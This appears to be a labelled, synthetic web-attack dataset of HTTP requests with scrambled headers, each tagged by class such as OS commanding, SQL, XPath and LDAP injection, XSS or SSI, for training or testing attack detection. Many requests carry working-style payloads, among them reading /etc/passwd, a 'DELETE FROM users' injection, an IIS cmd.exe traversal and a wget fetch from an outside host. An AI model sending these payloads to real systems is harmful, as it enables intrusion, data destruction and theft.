Content-Location: /idamrm/hSclyt/3Icd.cgi
Content-MD5: aW9haWV0ZXRuTjc4cmhlag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Sun, 22 Jul 07 02:42:10 GMT
Host: 187.29.71.64:27
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258, koi8-r, shift_jis;q=0.8, iso-2022-kr;q=0.4
Accept-Encoding: compress, deflate;q=0.4
Accept-Language: 58djHaes-nlbei, 96u7mner-ugt;q=0.4, lnnne-pzosU6t;q=0.8, 9dou-lEqowafa;q=0.6, Swu-ret3
Cache-Control: max-age=8
Client-ip: 38.62.165.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Thu, 01 Apr 04 19:13:39 GMT
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: ni1y
From: sTleEdu@dtAttFd.de
If-Modified-Since: Mon, 12 Jul 04 03:02:08 CET
If-Unmodified-Since: Fri, 19 Sep 08 03:06:31 GMT
If-Match: "bOyt@Pu8pbhe8sWKS.I"
If-None-Match: *
If-Range: Sat, 02 Dec 06 15:55:31 CET
Max-Forwards: 5768
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: k4sb2d a6el=bejnmwts
Range: 53-,7351-3480
Referer: /oBoduake/eana.mspx
TE: trailers
Trailer: Accept
User-Agent: srtEpgo (eBJwzvwkSN)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: deflate
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tuq=sztir9Ortetilei4t&irlotec=&y3t&geoaap=;l5s1K&6odVArinc4xif=%0a   cat    %0a   /etc/passwd%0a&9ania=sEBnteleoiaSq3

End - Id: 43067
Start - Id: 43298
class: OsCommanding
GET /oMl5D/sBi0/tanvIgiq9to9dep/cC0mJdvuPKHOk/fetoAwlLmeuldsji/czCRC.gIG@aFA/drfdiyo22slee/eRe.png?8.jadiv=0190&nicoger=%27%3B+ps++++-aux+++%3B HTTP/1.1
Host: 55.140.244.216
Connection: close
Accept: application/rtf;q=0.0, application/*
Accept-Charset: x-mac-chinesesimp, windows-1258;q=0.4, iso-8859-3;q=0.3
Accept-Encoding: deflate, compress, identity;q=0.6, identity, gzip
Accept-Language: r-ox, gsSmret-4y5tn;q=0.0, erSq-tsp;q=0.9, rRs-crvCat
Cache-Control: no-transform
Client-ip: 178.162.197.228
Cookie: s5aotSEoeetrhto=rfm3;sc2cp=gsayfdueHrashll;SesonaOGbdjdz=E;UZ.meta.NHIX=nil2ki4ootacite;Oioehrniemndgh=mnB;s
Cookie2: $Version="50"
Date: Sun, 03 Sep 06 22:58:10 CET
ETag: "1AjIN8knmDrbYXPi"
Expect: mb9t=tpt6m;rlemLtar
From: 4obu@odhS32t2rn.ch
If-Modified-Since: Sat, 14 Jun 08 13:54:31 UTC
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 949
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM cmhhMmwzZGlvdWRkT3NzZW5MbDdhZWlkbGFzc2xFdGUzbjBsc25jY25ya2pvb24=
Authorization: Digest nc=e66a33d5
Range: 534213-
Referer: /wtie.swf
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 1.8; ao-ti; rv:6.2.2) Gecko/87153555
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: gzip
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43298
Start - Id: 41925
class: SqlInjection
GET /n2/etqe1.E46v9gpt1/-FgF0wgethu85/onChel6rhArrt/cJf7so3xdtP0_7bvDDv9/xV1KDviG_q1W/a2C8qdivXbtM.e/olXBdA2.jpeg?Iiicgntmn=sh5mife%27%29%3B++++DEL%2F**%2FETE++++FROM+users+WHERE+upper%28username%29++++%3D+++upper%28+++%27admin HTTP/1.0
Host: 126.236.227.241:80
Connection: keep-alive
Accept: video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eblT-szhzro, eCwS-kP1rna5y;q=0.0
Cache-Control: max-age=7610
Client-ip: 21.123.50.241
Cookie: aad3nthtt=lvdhadfesana;saudbegculs7dSk=3mmawm
Cookie2: $Version="26"
Date: Wed, 03 May 06 24:37:38 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: usDda@iceeiIo.gov
If-Modified-Since: Wed, 04 May 05 11:11:53 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: "jzg.4KCCUmx9aRaI@2z3"
If-None-Match: *
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 5983
MIME-Version: 0.1
Pragma: Tertaen='tE'
Proxy-Authorization: Digest response="db02e31B81f2C3Ca2dDabA9e0D0Df81F"
Authorization: Digest qop=auth
Range: -0
Referer: /rTire/casicIM/wnpvdad/Dodei5.bin
TE: deflate;q=0.9,trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 7.2; kw-Oa; rv:1.9.9) Gecko/54455195
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9010x724
Via: s7io/9.4 www.dtdB.htm, 5.6 102.96.130.189, 9.9 www.rtRh.jpg
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41925
Start - Id: 49196
class: XPathInjection
GET /7onyotuubrIeefs/vcc/ae7s3eenhehatasodird/oxpWn3sThohaua2/lmailrItBLf40RXfj/YxmlxOdm8Gmboot.ini/aue48Nbc1w.CEoaXbfG3.jsp?sutis5exsgteew=%274%40lt&l902qLhW=1bs1%27%5D+++%7C++P++%7C+++%2F%2Fuser%5B++++name%2Ftext%28++++%29++++%3D%27rK&ritsa7a=tytl&rt44=HnlsnjgIyrdsse&hasltienw=202186&segn1peefkin=4177691547 HTTP/1.0
Host: www.tYtkB.de:891
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.7, compress;q=0.1, identity, gzip, compress;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 189.75.236.242
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Wed, 28 Jan 09 10:15:53 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Thu, 18 Nov 04 17:37:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 859
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Basic aFNhZWllRXI6ZWtyVGxsYWk=
Range: 943272-69165,-532,868-6
Referer: /Zihsxnes/g5uaer/Dyehi/yc9aemi.htm
TE: gzip;q=0.4,trailers
Trailer: If-Match
User-Agent: Txnonerbik (9alAJYr)
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: 3.0 164.15.193.254:1147, FTP/2.8 www.cme8.jpeg
Transfer-Encoding: compress
Upgrade: awna1h/3.9, fneo/6.3, ayJ7mt/6.9
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49196
Start - Id: 37122
class: LdapInjection
GET /e87fdekfejeirt/udzis5/EicthrrqiaueEne/auujRUW/eF/s5.jpg?hinotaiSpb=vO%40pAQBA&oe4fo3u3ulc1f=53185094&3tyeI4Jncg=y%3As&I-UTvcDnm1bodyO=as&dssotrriuvs1nt=jane%29%28+++%7C++++%28t5%3D*%29&0VsT@C=sboo4b HTTP/1.0
Host: 164.3.175.155:89501
Connection: l3rds
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: hao-stnlsr;q=0.6
Cache-Control: max-stale
Client-ip: 55.97.57.216
Cookie: q484DL=qiajdsIydto&mh;eiNxohr7TrnlCl=23;rFUroosgt8=erzaagr4ohuyR;tnidOirUrAtwys=rEIpF
Cookie2: $Version="74"
Date: Mon, 04 Aug 08 02:38:04 CET
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Thu, 03 Feb 05 12:26:08 GMT
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: *
If-None-Match: "PwNiLDk7mW.wcwNJk"
If-Range: Fri, 22 Sep 06 01:55:36 GMT
Max-Forwards: 87
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: ntaf gi6ici=mesubRv3
Range: -5173
Referer: /dalu/errt/aaev.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 5.9; ao-Le; rv:3.4.5) Gecko/04394298
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.1 www.esexan.htm, FTP/6.2 www.A26haNeh.jpg, HTTP/0.8 138.46.240.221
Transfer-Encoding: cEha
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37122
Start - Id: 42980
class: OsCommanding
GET /WstyleservicesM9libJFh/eModoapaEN9fm/HcnelEOuooAsu/txEnDuFQnm/g2p/rnputxe60neroe.asp? HTTP/1.0
Host: www.npTe.de:80
Connection: n0rdok
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: iQe-tHeakr;q=0.4, pwh-kE5te, q3-e4lD, ce-0Nusat, roRrh-St;q=0.9
Cache-Control: min-fresh=128
Cookie: n2jgniyn=rGoertysnrnb;lfhtqstfkeecl=30;s9inoceato=     ;     echo   ;    w      ;   uname  -a      ;   id
ETag: W/"hihhRMqJ3pb0C8609wd3"
Expect: jrornf
If-Modified-Since: Fri, 26 Jun 09 01:28:29 CET
If-None-Match: "AKn7c0AA_Ww5XNhEvY"
If-Range: *
Max-Forwards: 8
Pragma: w='yaieti'
Referer: http://www.ezhkhte.org/elrytesp/optan/tnamht/nmyta/IEooeaol.pl
User-Agent: Mozilla/1.5 (X11; U; Solaris 1.5; ab-7s; rv:7.2.0) Gecko/37921963
Transfer-Encoding: deflate
----: -------------

null

End - Id: 42980
Start - Id: 47280
class: XSS
GET /cqy_FAX_J/scriptWC/maTe3oeayhd8ksffnHt/pvSYfMLhpM_oYn7zJIz/tEjtASbPf-NC15PDGr.dll?eu=53676888&20et=gwsJm&t01antsdSmuhl=595983&nturI=5045640919&gatter=ofesdgaaeaeri0sx&atRttseap=8&cunitnrT=i7o&toleqnijh=exec%3E%3EL4&8rPElIgjv=%7Expoteen+ei&pitlyimtn2=%27cder&he0wco6o=78461735&vb3thegltru=script++alert++++%285orrodvsdrEoews.tevai%29script++&doynduelhdRtblx=79932147&QMBXaLX2=7395&jBLy4andsservicesKcba=ieeijnie HTTP/1.0
Host: 43.5.30.78:4
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=56727
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Tue, 03 May 05 07:20:29 UTC
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: peTeu9@mayraae.fr
If-Modified-Since: Sat, 11 Oct 08 20:17:52 CET
If-Unmodified-Since: Thu, 26 Nov 09 01:38:15 UTC
If-Match: *
If-None-Match: *
If-Range: "fdxgrRwlfyB.BziEyE-"
Max-Forwards: 98
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: Digest nonce
Range: 3-25949,-0524
Referer: /ssbaeo5/eSufr.bin
TE: deflate
Trailer: Accept-Charset
User-Agent: oRdTqx http://www.3cir.st
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 581x8741
Via: 2.0 87.155.190.119, 7.7 www.eioste5.css:2, HTTP/5.9 www.ipSxtt.png:9
Transfer-Encoding: compress
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 972806638968754
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47280
Start - Id: 42354
class: SqlInjection
GET /xKTKUf76R/t6gHwCprby_xMR25sY/qb1twYPW2FfmYSQj/nTHf_otWB1Ls/EcvexecHQnNnW6r4A/scAg6x-i3uyiV6_tBLe/tr2ig/fmyhts1rrceI/p-r33sN-rS3jaDIU/tdXkwPgJ/Sdt9bqe.cfm?qASrhpl=n&l0aabltrxg=onTanOceZhbxm2o&6%u21SSRinputnWjp=1&Y2dsa3kbs=Om&shcis9o=%27++OR+%27mdputdoEp8%27++++%3D++++%27lxeF%27%2B%27hii1he%27&slbaLgarqrmory=wqk5i&HYfr=t&eD=0475668&hRNWSRtU0=00300104 HTTP/1.0
Host: www.i6hr.ch
Connection: close
Accept: audio/*, application/x-tar;q=0.1, text/*;q=0.9
Accept-Charset: x-mac-chinesetrad;q=0.7, windows-874, windows-1251;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: max-stale=12
Client-ip: 167.183.199.0
Cookie: Iol=1W24U_abq-q4;m8a=iTQxbYUmQup;Lace=921667
Cookie2: $Version="89"
Date: Thu, 24 Aug 06 06:18:27 GMT
ETag: "Jzw07-CaqNHQ-4c"
Expect: ieiqg
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Fri, 18 Jun 04 09:17:23 UTC
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 9
MIME-Version: 6.6
Pragma: nllcigJd=tehts9t
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM c3V0aWFFbXpsN1lmZHJ0ZW91dm5ldHR1YXgycnJjYXI3c3JzeGNycnVydG43
Range: -966,396-333,-3990
Referer: http://ttAnotm6.org/Ndderth/cdniei/itutfp.jsp
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: cdwesrtqeshesnfg
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: FTP/0.2 60.178.177.40
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42354
Start - Id: 40586
class: SSI
GET /g4r/t2cw6lnSsn/ZQoO/ocoant9wotutu/Toso/0SI/dKOs8W/jcP_NAinNPRJKR/tB8o/TnOepr/s6A/sC-V6ai9g.png?KzZUaxRDPBL=2&j0Hq1=2&sHeyrsido=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&4yd6Se=%28vci%7Ebe%5Badform&ejuhMh1e8mifa9h=58884760&net=feyn5roara&amlo3f2uc8Tree=zr9ctoecUIein&CKPH@qKQhtaccesUq=RmerTm HTTP/1.0
Host: 205.18.105.134:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-2, isiri-3342, cp-932;q=0.5, euc-cn
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 25.93.112.146
Cookie: awuZe=897808;SR6.Y=502296;6snhnIiipgao=lpu;paehn2tath6aext=a4bsbSWoj;8Hinsert5=2;lOaefyEW=dOnieagrmatzhdntne
Cookie2: $Version="87"
Date: Sat, 17 Oct 09 17:34:11 UTC
ETag: W/"whojoGjgABpnxyP"
Expect: o2e9=wotat35
From: ws8c3i@tat8.st
If-Modified-Since: Sun, 04 Apr 10 11:04:33 UTC
If-Unmodified-Since: Thu, 16 Mar 06 21:08:13 GMT
If-Match: *
If-None-Match: "a@RrjfF@TjtUSHu"
If-Range: "y@PrGDrfuB7i7w6"
Max-Forwards: 114
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: NTLM cGZpbnRldDZlY254MW1Bc3Joc2VyanBuVHlzOHl0cGV6dDdyc3J2TWlocGl4
Range: 044301-645,550-25
Referer: http://www.aWBzhex.com/uhdAdtn.swf
TE: trailers,trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/8.1 (compatible; tanlnk; Windows NT; amseapl; ihO5gNe1s)
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8517x087
Via: HTTP/7.5 www.uuin.css, 0.9 www.iCopnne.jpg
Transfer-Encoding: identity
Upgrade: esy/0.2, er0/7.6, eho4t/0.2
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 163.253.181.70
X-Serial-Number: 69115
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40586
Start - Id: 43130
class: OsCommanding
GET /1akNl/f8Z1C9OLNH@Kzw/e8Ska/9n7sc/m__h/tTR/Jz5xfXd6/jUH8eHguIZIMwWO/7ssmet0cnnhoRaIustc.asmx?oS=l5nul&nt5rnesem=tpQDv4xuG&csoslnEdbgxls=2421408&zsCipha3zxHW2=%2FW+&ftpFCstylekY=%27+%3B++ps++-aux%3B&iujbm=18474&lSeio1wA=taoa&b00.QiO=select%7E HTTP/1.0
Host: www.NmouTlTi.uk
Connection: keep-alive
Accept: image/png;q=0.4
Accept-Charset: koi8-r;q=0.0, iso-8859-3;q=0.2, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=96
Client-ip: 171.241.211.11
Cookie: 6RhMf=2427831642;1gVg=4twhere;ksdi=e~
Cookie2: $Version="87"
Date: Fri, 26 May 06 03:07:29 UTC
ETag: W/"j5PMXW@J9gNIgeb4CyoO"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Mon, 09 Aug 04 08:16:29 UTC
If-Unmodified-Since: Tue, 31 Aug 04 16:56:28 UTC
If-Match: *
If-None-Match: *
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 85
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: imra7f ihefhw=mt9ah
Range: 94856-,22-022
Referer: http://www.inamtRmi.net/gwty/hncolfde/ne4il.php3
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.6 (compatible; Konqueror/1.1; Mac OS X; 2ocht3r7; nsrhs1; 9adiuxet)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.2 www.ieas8Tn.jpg, 6.0 142.98.198.175, urfon/7.8 88.245.106.96
Transfer-Encoding: compress
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43130
Start - Id: 49845
class: XPathInjection
GET /rMC5h/iearvtneihheabnftrR/5q73B/uzahs_v/I74he/eKTKTrS5wI-uPmN/K.VqJcatKYSacceptGAaN/mnlehails.php4?tTnJmlcr5e=646800131&ogAi8s7teeiRe=4&seeeeIi=ftnSeFuep&deaeajptrTsiet=fp1aaedl3yv&tt=96&soi0heoko=walscccbiWe2a&hc1xiraqi4t8sc=pdrcpZid8g+os+&zvomudmsro=allfntrahab9oya&CUinsertGg7=it6ta&tluc=0&3vTlsoe1xakt=nott%27%5D+++++%7C+P+%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28++%29+++%3D++++%27nnc HTTP/1.0
Host: www.oioeh.fr
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.4, identity;q=0.8, gzip, identity
Accept-Language: nd-goh, e5e8ma-oreue;q=0.2, retYel-yipn8gsb
Cache-Control: no-store
Client-ip: 167.249.63.97
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Thu, 04 Oct 07 06:01:58 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: ackeIlr=n1aE
From: ohlydam@WdehaAi.biz
If-Modified-Since: Thu, 21 Jul 05 01:11:55 CET
If-Unmodified-Since: Thu, 12 Jan 06 16:12:41 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: "YqnKb.9Hz0Noklq"
Max-Forwards: 69
MIME-Version: 7.1
Pragma: 6N='m0cnwdc'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: dltoae ntEssu=memsotou
Range: 376648-,445-
Referer: http://www.htrIe.de/Pnwrnaa/rhn17c/knaye.avi
TE: deflate
Trailer: Accept
User-Agent: Alraaatode8em
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 967x245
Via: 7.4 www.emxdo9.html, 0.2 102.24.240.116, ftoh/6.0 www.eodiin.css:8449
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 490 229.47.175.202 "enpes8N" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49845
Start - Id: 43153
class: OsCommanding
GET /autehfaBu/ta1m9icdruueyH/ovtelnetftptZ6GGGsGbVc/fs9e7ndoMnss68tnoe/shqtudc8ileiach/E3/CId/sJy52RTEYWnP.aspx?an=%22+++%3B+++%2Fusr%2Fbin%2Fwget+++www.stne.com%2Fveinlege++%3B&ouhh7=+1&WbfrommTUF0O=exicsa HTTP/1.0
Host: 160.120.243.209
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: UeA-9;q=0.8, es0-eloenaw, Oran-r;q=0.8, csRu-ootsY
Cache-Control: no-store
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="08"
Date: Mon, 06 Jun 05 21:31:16 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: aNg2ee
From: riAeyrh@tgaMea.st
If-Modified-Since: Fri, 06 Apr 07 16:04:23 UTC
If-Unmodified-Since: Wed, 03 May 06 14:18:06 CET
If-Match: "bHT7Hc8qQDA-hFc"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 375
MIME-Version: 1.3
Pragma: rsHNe=dcLee
Proxy-Authorization: NTLM bW9lbndtb250NGE5ZHRscnhuYTI2ZGRyMlNjc2x0cmhGTg==
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: /4eeo/aarstp/Rqureaeh/snqw.msf
TE: gzip;q=0.4,trailers
Trailer: Host
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 3.7; At-e1; rv:4.8.5) Gecko/82352242
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: FTP/8.3 38.33.121.80
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43153
Start - Id: 42616
class: SqlInjection
GET /oZ4X/tElaoeesin/6omrsaoruteas.mdb?Ud5kUlikevcmdq=2&4srh=40545&tEhpie=37beinsert&9locationv-mC=+%3C&N4l8kcKfrom=9658120&ohhieotalnemv=%27+OR++%27rjbhe6csgAny%27+++++%3D+%27hymy%27%2B%27ln%27&eenxLtt8fo=4tEoadaasa&aeosuvh=nzhVo&6o=9&ulbhmouDxxtoabe=rF1kBP896e&3mV9G4=o2 HTTP/1.0
Host: www.4sgS.it
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 51.55.210.40
Cookie: n9rpi=gMD0f;eSomcdeaie=1631399083;CRX_l=wD1deu6sn
Cookie2: $Version="737"
Date: Sun, 12 Nov 06 12:11:10 GMT
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Fri, 01 Jun 07 03:18:48 GMT
If-Match: *
If-None-Match: "dIr2jl7MssNkq5hgxF"
If-Range: Wed, 06 Dec 06 14:06:12 CET
Max-Forwards: 38
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Basic c3Nlc29mOm1ob3R5dGJw
Referer: /dgtsciAi.cgi
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/7.0 (Windows; U; Windows NT 2.2; nf-8o; rv:5.6.7) Gecko/40412675
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/7.5 www.i4tgin.shtml:59, 5.8 230.89.99.224:8341, HTTP/3.1 222.23.88.52
Transfer-Encoding: sseJ7; icrrsiiu=Ro7eGOe
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42616
Start - Id: 44179
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.neund5leu.org
Connection: keep-alive
Accept: text/*, text/html;q=0.9, image/png;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.0, deflate, compress
Accept-Language: ascicot-oOshet, iReNeU-ta, iyz-si;q=0.5
Cache-Control: nt='nhu'
Client-ip: 206.218.166.35
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Fri, 30 Dec 05 03:04:59 GMT
ETag: W/"M9dWmzaYsbHXIY4Lq7Am"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Wed, 14 Sep 05 11:17:45 GMT
If-Unmodified-Since: Thu, 07 May 09 22:07:52 CET
If-Match: *
If-None-Match: "DhFghXeZQ.Z3snFz"
If-Range: Mon, 18 Jan 10 21:48:57 GMT
Max-Forwards: 8
MIME-Version: 4.3
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest opaque="Henvik"
Range: 5-,-97,-5
Referer: /boyfeiew/indbfo3.jpeg
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 3.0; aT-eg; rv:5.0.0) Gecko/28039202
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
